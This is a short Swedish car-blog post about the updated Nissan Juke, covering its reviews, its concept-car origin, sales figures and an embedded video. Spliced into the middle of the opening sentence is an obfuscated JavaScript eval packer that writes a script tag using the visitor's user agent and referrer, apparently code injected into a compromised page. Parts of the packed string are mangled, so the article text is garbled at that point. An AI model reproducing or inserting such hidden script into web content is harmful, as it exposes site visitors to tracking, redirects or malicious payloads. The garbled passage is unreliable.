Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Nya Nissan Juke är här

Nya Nissan Juke är här
Sebastian

type=”text/javascript” src=”http://videos.goviral-content.com/playerjs-yt/nissan_juke_12650.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1448844&skinName=light&wmode=window&hideChrome=0″>

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tddfs|var|u0026u|referrer|bzzdi||js|php’.split(’|’),0,{}))
är gör den debut igen, den otroligt omtalade bilen Nissan Juke får sig ett lyft.

Betygen efter testerna i hela världen har varit mycket goda gällande allt från  säkerhet till prestanda.Med sin välbehövliga dynamik är den lilla bilen ett alternativ till den traditionella oinspirerade kombin.

Bilen är inspirerad av Qazana konceptbil som visades upp vid bilsalongen i Genéve 2009.

Under knappt ett år tillverkades ca 120 000 exemplar av Nissan Juke och försäljningen uppgick till 100 000 exemplar. Precis som Nissan Qashqai har Juke banat väg genom en tidigare konservativ marknad.

Kika på videon ovan så får ni en bättre uppfattning av Nissan Juke fungerar.